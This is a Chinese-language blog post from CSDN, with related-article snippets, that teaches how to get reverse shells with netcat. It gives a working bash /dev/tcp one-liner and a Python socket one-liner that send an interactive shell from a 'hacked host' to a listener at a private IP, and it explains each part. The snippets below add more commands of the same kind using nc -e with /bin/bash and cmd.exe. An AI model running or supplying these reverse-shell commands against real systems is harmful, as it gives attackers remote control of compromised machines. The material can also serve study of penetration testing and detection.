netcat 反弹shell

最新推荐文章于 2023-12-03 21:41:13 发布
最新推荐文章于 2023-12-03 21:41:13 发布
阅读量336 收藏
点赞数
文章标签: netcat 反弹shell
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_40328085/article/details/100980784
版权

第一种情况:用 bash -i

客户机:netcat -l -p 7777
服务器(被黑主机):bash -i >& /dev/tcp/192.168.227.1/7777 0>&1
>& 后面跟上/dev/tcp/ip/port
    这个文件代表将bash -i 的标准输出和标准错误输出 重定向到 这个文件(描述符)。(其实有点像个通道)
0>&1
    表示,bash -i 的标准输入重定向到这个文件(描述符)的输出上

第二种情况: 用一句话 pathon 程序


python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.37.131",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

其中 python -c                                   调用C库并执行。
'import socket,subprocess,os;                socke相关,子进程相关,操作系统相关    
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);    创建套接字socket s
s.connect(("192.168.37.131",1234));            套接字绑定IP及端口
os.dup2(s.fileno(),0);                     标准输入重定向到套接字的文件描述符
os.dup2(s.fileno(),1);                    标准输出重定向到套接字的文件描述符
os.dup2(s.fileno(),2);                    标准错误重定向到套接字的文件描述符
p=subprocess.call(["/bin/sh","-i"]);'
            产生子进程实现

早睡男
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
netcat使用及反弹shell
Bu2n的博客
02-20 5139
Netcat反弹shell
Yy10205473的博客
01-14 576
Netcat反弹shell基础介绍使用python反弹shell应用场景使用方法当nc不支持-e时如何反弹shell应用场景使用方法 #应用场景 某些拿到服务器权限之后,想要设置一个反弹shell。但是目标服务器上有安装nc时。 基础介绍 将liunx系统下的bash(shell)传递到window系统下的pc 反弹shell:bash -i >& /dev/tcp/IP地址/端口 0>&1 liunx主机连接window主机 bash -i :已交互模式运行bash she
netcat反弹shell
iteye_16188的博客
09-01 718
注意:如果想要在小于1024的端口做监听,那么需要root权限 一)通用场合 1. 自己机器:nc —nvlp 443 2. 目标机:nc attacker'sIP 443 —e /bin/bash -n:不解析域名 -v:显示连接信息 -l:处于监听状态 -p:端口号(有时需要单独把-p选项拿出来) 二)如果不支持-e选项:如果代码编译的时候有指定GAPING_SECURITY_...
NC / Netcat - 反弹Shell
dieman0446的博客
02-06 247
原理 实验环境: 攻击机:windows机器,IP:192.168.12.109 受害机:linux机器,IP:192.168.79.1 攻击机:设置本地监听端口2222 C:\netcat>nc -l -p 2222 受害机:反弹/bin/bash 到攻击机(192.168.12.109)的2222端口 roo...
【工具】Netcat(2)反弹shell
爱美食的Geek
02-21 2944
应用场景:某些拿到服务器权限之后,想要设置一个反弹shell。但是目标服务器上有安装Netcat时。 1.反弹shell(bash) 反弹shell命令:bash -i >& /dev/tcp/ip/port 0>&1 pc接受netcat命令:nc -lvp port bash -i表示以交互模式运行bash shell。重定向符>&,如果在其后加文...
反弹shell1
08-03
在TCP反弹Shell中,攻击者首先在本地用`nc(netcat)`命令监听一个端口,如443端口,`nc -lvp 443`。然后在目标机器上,使用各种方法创建一个连接到攻击者IP和端口的Shell,例如: - 使用`awk`命令创建TCP连接并...
Linux下NC反弹shell命令(推荐)
09-15
在网络安全和渗透测试中,反弹Shell是一种常见的技术,它允许攻击者远程控制受感染的系统。在Linux环境中,网络工具`nc`(Netcat)常被用来创建这种连接。本篇文章将详细介绍如何在Linux下使用`nc`进行反弹Shell操作...
netcat得到root权限
01-20
1. 反弹Shell:描述中提到的“可反弹shell”是指攻击者通过网络连接远程控制受害者的机器。当攻击者在目标系统上成功创建一个反向Shell时,受害者机器上的Netcat会监听特定端口,并将接收到的命令传递给操作系统...
32+64位socat,Android版,arm+arm64,android手机可用,android反向shell工具
最新发布
04-16
其功能与有瑞士军刀之称的 Netcat 类似,可以看做是 Netcat 的加强版。 Socat 的主要特点就是在两个数据流之间建立通道,且支持众多协议和链接方式。如 IP、TCP、 UDP、IPv6、PIPE、EXEC、System、Open、Proxy、...
NC反彈SHELL教學
05-13
【描述】:“NC反彈SHELL 教學加上資源檔、提權工具”表明这个教程不仅教授如何使用nc创建反弹shell,还提供了相关的辅助资源和提权工具。提权是指在获得基本访问权限后,进一步提升到管理员或更高权限的过程,这...
提权(2), Netcat反弹shell
探测???
12-03 262
Netcat(nc)是一款网络工具,也被称为“瑞士军刀”,可以读写TCP或UDP网络连接,透过使用TCP或UDP协议的网络连接去读写数据.它被设计成一个稳定的后门工具,能够直接由其它程序和脚本轻松驱动。同时,它也是一个功能强大的网络调试和探测工具,它能够建立你需要的几乎所有类型的网络连接Netcat可以用于端口探测、传输文本信息、传输文件/目录、远程电子取证信息收集、远程控制等常用操作。
netcatshell反弹测试
HideInTime的博客
04-21 411
什么是反弹shell?   反弹shell(reverse shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。 为什么要反弹shell? 通常用于被控端因防火墙受限、权限不足、端口被占用等情形。 举例:假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,
netcat 实现shell反弹
u011975363的专栏
04-09 675
主机1 输入 主机2 输入 当输入ifconfig时可以查看到主机1的Ip信息说明反弹成功。
内网隧道代理技术(五)之 Netcat反弹Shell
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
06-24 764
Netcat简称NC,是一个简单、可靠的网络工具,被誉为网络界的瑞士军刀。通NC可以进行端口扫描、反弹Shell、端口监听和文件传输等操作
Netcat(NC)正反弹shell
来到了学渣的博客
01-07 2095
Necat(NC)正反弹shell Netcat反向反弹shell 目标:Win7的shell反弹到kali上 kali的nc命令 nc -lvp 888 Win7靶机nc命令 * nc64.exe IP 端口号 -e cmd.exe 然后可以在kali攻击端控制目标端的win7系统 Netcat正向反弹shell 目标是将kali上的shell弹到win7上 kali的n...
netcat教程
热门推荐
chenj_freedom的技术点滴
08-11 1万+
简介 netcat是网络工具中的瑞士军刀,它能通过TCP和UDP在网络中读写数据。通过与其他工具结合和重定向,你可以在脚本中以多种方式使用它。 各种版本的netcat netcat有非常多的版本,刚开始我自己也很混乱,因为各个版本的netcat使用方法和参数都不太一样。这里列举下我现在实验环境中的几个版本。 case1 Kail Linux自带的nc工具,版本是v1.10-41+b1。
使用netcat进行反弹链接的shellcode
weixin_34072637的博客
09-01 541
from:http://morgawr.github.io/hacking/2014/03/29/shellcode-to-reverse-bind-with-netcat/ 这篇文章主要是谈,在远程溢出时怎样构造shellcode,才能形成一个有效的反弹链接。 0x00 反向绑定远程shell 让本地主机和远程shell建立起连接的方法有很多种,其中最常见的是在远程主机上开放一个端口,然后...
Netcat 从监听开始简单易懂 ,正向与反向shell 的学习过程
任雪飘的博客
03-01 626
大家好!我是任雪飘!一个web 菜鸡,讲一个nc 正向与反向shell 的学习过程! 首先我们下载netcat 安装方式一 yum install -y netcat 或者 yum install -y nc 安装方式二 https://eternallybored.org/misc/netcat/ 把netcat 放入linux 系统里面 进入netcat-0.7.1.tar.gz所在目录,并执行下面的命令: tar -zxvf netcat-0.7.1.tar.gz -C /u
反弹shell常用命令
07-30
1. Netcat反弹shell: ``` 本地监听:nc -lvp <本地端口号> 远程连接:nc <本地IP地址> <本地端口号> -e /bin/bash ``` 2. Bash反弹shell: ``` bash -i >& /dev/tcp/<本地IP地址>/<本地端口号> 0>&1 ``` 3. ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值